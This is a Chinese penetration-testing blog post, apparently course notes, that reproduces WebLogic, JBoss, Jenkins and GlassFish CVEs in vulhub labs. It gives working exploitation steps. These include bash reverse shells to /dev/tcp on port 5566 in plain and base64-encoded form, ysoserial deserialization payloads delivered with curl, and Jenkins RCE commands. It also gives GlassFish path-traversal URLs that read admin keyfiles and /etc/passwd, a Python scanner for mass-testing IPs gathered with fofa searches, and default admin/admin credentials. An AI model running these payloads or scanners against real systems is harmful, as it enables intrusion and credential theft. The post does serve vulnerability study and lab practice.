第60天:服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish

最新推荐文章于 2024-05-11 13:44:48 发布
最新推荐文章于 2024-05-11 13:44:48 发布
阅读量1.4k 收藏 20
点赞数 31
文章标签: 中间件 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/137749999
版权

目录

思维导图

案例一:中间件-Weblogic-工具探测

案例二: 中间件-JBoos-工具脚本直接利用

弱口令

反序列化命令执行漏洞

CVE-2017-12149

CVE-2017-7504

案例三:中间件-Jenkins-工具脚本利用

远程代码执行漏洞

远程命令执行漏洞

案例四:中间件-GlassFish-工具脚本利用

思维导图

案例一:中间件-Weblogic-工具探测

weblogic端口:7001

工具地址: GitHub - ghealer/GUI_Tools: 一个由各种图形化渗透工具组成的工具集

靶场环境

启动利用

输入探测是否有漏洞

 有漏洞直接可以命令执行,shell上传

下图所示的都可以用工具一键探测

案例二: 中间件-JBoos-工具脚本直接利用

jboss通常占用的端口为1098,1099,4444,4445,8080,8009,8063,8093

弱口令

fofa搜索: "JBoss" && title=="Welcome to JBoss™"

点击welcome to console

账号密码都是admin,admin

可以尝试进入

反序列化命令执行漏洞

CVE-2017-12149

靶场位置: https://vulhub.org/#/environments/jboss/CVE-2017-12149/

 启动docker环境

首先先把反弹shell的语句进行base64位编码

bash -i >& /dev/tcp/192.168.172.132/5566 0>&1

序列化的操作,运行java脚本,echo 后面是反弹shell的base64编码,生成可以利用的poc

java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Mi4xMzIvNTU2NiAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

利用poc进行curl请求/invoker/readonly该地址为进行反序列化的地址,同时kali开启监听

curl http://192.168.172.169:8080/invoker/readonly --data-binary @poc.ser

运行

CVE-2017-7504

靶场环境:https://vulhub.org/#/environments/jboss/CVE-2017-7504/

与CVE-2017-12149命令都一样只是,反序列化请求的地址不同,可以利用同一个poc

该漏洞请求的地址为 /jbossmq-httpil/HTTPServerILServlet,访问该页面存在证明有漏洞

案例三:中间件-Jenkins-工具脚本利用

远程代码执行漏洞

脚本利用地址:GitHub - vulhub/CVE-2017-1000353: jenkins CVE-2017-1000353 POC

该脚本必须使用java"1.8.0_291"才可以正常使用

首先先执行在/tmp下创建一个success文件

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

然后用python脚本执行该poc

python exploit.py http://192.168.172.169:8080 jenkins_poc.ser

 进入docker中查看

这里尝试直接利用下面的语句getshell失败,个人猜测,可能是命令太长,各种符号转义了

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -i >& /dev/tcp/192.168.172.132/5566 0>&1"

使用如下命令

"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Mi4xMzIvNTU2NiAwPiYx}|{base64,-d}|{bash,-i}"

这段命令是一个 Bash 命令,它执行以下步骤:

  1. echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Mi4xMzIvNTU2NiAwPiYx

    • echo:将字符串打印到标准输出。
    • 字符串:"bash -i > /dev/tcp/192.168.172.132/5566 0>&1",这是一个 Base64 编码的字符串。

  2. base64,-d

    • base64,-d:对上一步中的字符串进行 Base64 解码。

  3. bash,-i

    • bash,-i:使用 -i 选项启动一个交互式 Bash shell。

因此,整个命令的功能是:

  1. 解码 Base64 编码的字符串,得到一个 Bash 命令:bash -i > /dev/tcp/192.168.172.132/5566 0>&1
  2. 执行这个 Bash 命令,该命令将打开一个到远程主机的反向 shell 连接(使用 TCP 端口 5566),并使 shell 的输入和输出重定向到该连接。

运行结果

远程命令执行漏洞

靶场环境: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

脚本地址:https://github.com/smokeintheshell/CVE-2018-1000861

首先利用该脚本可以直接执行系统命令

直接利用反弹shell的语句,还是失败,猜测转义导致

bash -i >& /dev/tcp/192.168.172.169/5566 0>&1

利用刚才的语句

"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Mi4xMzIvNTU2NiAwPiYx}|{base64,-d}|{bash,-i}"

成功

案例四:中间件-GlassFish-工具脚本利用

靶场位置

利用语句

读取网站账号密码:/theme/META-INF/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afdomains/domain1/config/admin-keyfile

读取linux passwd:/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

读取windows_ini: /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini

访问靶场主页面,需要账号密码

直接查看账号密码

查看/etc/passwd

下面是一个python开发的自动化检测是否有直接读取密码,读取linux passwd,Windows ini的脚本

import requests,time

def read_pass(url):
    urls = 'http://'+url+'/theme/META-INF/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afdomains/domain1/config/admin-keyfile'
    try:
        result = requests.get(urls,verify=False).text
        #print(result)
        if 'asadmin' in result:
            print('read_pass:'+ url + '-->ok')
        else:
            print(url + '-->false')
    except Exception as e:
        time.sleep(0.1)

def read_windows(url):
    urls = 'http://'+url+'/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
    try:
        result = requests.get(urls,verify=False).status_code
        if result == 200:
            print('read_windows:'+ url + '-->ok')
        else:
            print(url + '-->false')
    except Exception as e:
        time.sleep(0.1)

def read_linux(url):
    urls = 'http://'+url+'/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
    try:
        result = requests.get(urls,verify=False).status_code
        if result == 200:
            print('read_linux:'+ url + '-->ok')
        else:
            print(url + '-->false')
    except Exception as e:
        time.sleep(0.1)


if __name__ == '__main__':
    for url in open("ips.txt"):
        read_pass(url)
        read_windows(url)
        read_linux(url)

fofa搜索:"glassfish" && port="4848" && protocol="http"

利用fofaviewer保存ip到ips.txt利用

运行结果如图,不方便展示。

xiaojiesec
关注
  • 31
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
服务攻防-中间件安全&CVE 复现&Weblogic&Jenkins&GlassFish
m0_61506558的博客
12-19 484
(一)中间件-Weblogic安全(一)中间件-Weblogic安全探针默认端口:7001,Weblogic是Oracle公司推出的J2EE应用服务器,检测工具,如下github链接2.cve_2018_2893 工具3.cve_2018_3245 工具4.cve_2020_14882 工具。
服务攻防-中间件安全&CVE 复现&K8s&Docker&Jetty&Websphere
m0_61506558的博客
12-20 640
Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。它从容器中逃了出来,因此我们形象的称为Docker逃逸漏洞
网络安全全栈培训笔记(60-服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish
qq_46343633的博客
02-02 1354
1、中间件-Weblogic安全2、中间件JB00S安全3、中间件-Jenkins:安全4、中间件-GlassFish安全
第六十一 服务攻防-中间件安全&CVE复现&K8S&Docker&Jetty&Websphere
qq_46343633的博客
02-03 1480
0、中间件-K8s安全1、中间件Jey安全2、中间件-Docker安全3.中间件-WebSphere:安全
60-服务攻防-中间件安全&CVE 复现&Weblogic&&Jboss&Jenkins&GlassFish
weixin_52529261的博客
02-15 1253
主要学习了解Weblogic、JBoos、JenkinsGlassFish四个中间件的常见CVE、未授权和弱口令等漏洞。
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现
jennycisp的博客
11-01 133
中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, JenkinsGlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等1、中间件-Weblogic安全2、中间件-JBoos安全3、中间件-Jenkins安全4、中间件-GlassFish安全常见中间件安全测试:1、配置不当-解析&弱口令。
第59-服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx
weixin_52529261的博客
02-07 845
本文章涉及Apache、Tomcat及Nginx等中间件重要的CVE漏洞复现
第61-服务攻防-中间件安全&CVE 复现&K8s&Docker&Jetty&Websphere
weixin_52529261的博客
02-19 710
涉及中间件K8s、Docker、Jetty、Websphere相关知识介绍和漏洞利用复现
第59服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx
weixin_71529930的博客
04-13 995
war文件是一种web应用程序格式,包含了一个项目中所有源码的集合并按一定的目录结构组织,由于将所有文件合并成一个文件,因此节省了文件的传输时间。发送到repeater,文章末尾加入,php代码,右侧可以看到上传路径。利用icon目录必须是一个真实存在的目录,%2e为 "."如果cgi和cgid模块被设置了,那么可以进行命令执行。访问大马 根目录/jshell/jshell.jsp。找一个jsp编写的大马,把他压缩为war后缀的。搭建起来以后,抓包,put方式上传。上传php文件,会显示不能上传。
CVE-2020-36184:CVE-2020-36184 && Jackson-databind RCE
05-29
描述 2.9.10.8之前的FasterXML jackson-databind 2.x错误地处理了与org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource相关的序列化小工具和键入之间的交互。 如何进行RCE pom.xml ...
tiki组件:CVE-2020-15906 && CVE-2021-26119复现
11-24
tiki组件:CVE-2020-15906 && CVE-2021-26119复现
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。 容易利用的漏洞使高特权攻击者可以通过HTTP...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2020-14882​&14883:Weblogic RCE复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编
中间件的使用
2303_77327646的博客
05-05 251
【代码】中间件的使用。
聊聊 ASP.NET Core 中间件(三):如何创建自己的中间件
yangshuquan的专栏
05-07 520
本质上,中间件类也是一个普通的 .NET 类,它不需要继承任何父类或者实现任何接口,只要遵守一些约定,就可以轻松创建自己的中间件
服务治理中间件】consul介绍和基本原理
康师傅没有眼泪
05-08 1843
Consul是一个服务网格解决方案,提供了一个功能齐全的控制平面,具有服务发现、配置和分段功能。这些功能中的每一项都可以根据需要单独使用,也可以一起使用来构建一个完整的服务网格。Consul需要一个数据平面,并支持代理和原生集成模型。Consul提供了一个简单的内置代理,因此一切都可以开箱即用,但也支持第三方代理集成,如Envoy。Consul的主要功能有:服务发现: Consul的客户端可以注册一个服务,比如api或mysql,其他客户端可以使用Consul来发现特定服务的提供者。
德国储能项目锂电池储能集装箱突发火灾:安全挑战再引关注
最新发布
iotsensor的博客
05-11 449
德国警方估计,此次火灾造成的经济损失约为50万欧元,但更为严重的是,起火原因至今尚未明确,这无疑给储能系统的安全性再次敲响了警钟。在储能系统大规模应用的背景下,如何有效预防和控制锂离子电池的热失控和火灾风险成为了一个亟待解决的问题。目前,虽然技术上尚未有绝对保证锂电池不发生热失控的方法,但通过气体传感器技术等手段对储能电池进行实时监测和预警,仍被视为一种可行的预防措施。针对储能电池热失控,要坚持“早发现,早处置”的原则,对储能集装箱锂电池热失控初级阶级进行超前探测预警,将火灾隐患扑灭在萌芽阶段。
如何解决 提供可传递的易受攻击的依赖项 maven:com.fasterxml.jackson.core:jackson-databind:2.13.3 CVE-2022-42003 7.5 Deserialization of Untrusted Data vulnerability pending CVSS allocation CVE-2022-42004 7.5 Deserialization of Untrusted Data vulnerability pending CVSS allocation
06-10
例如,可以将 jackson-databind 升级到 2.13.4 版本或更高版本,该版本已修复了 CVE-2022-42003 和 CVE-2022-42004 的漏洞。 2. 移除依赖项:如果没有必要使用 jackson-databind,可以考虑将其从项目中移除,从而...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值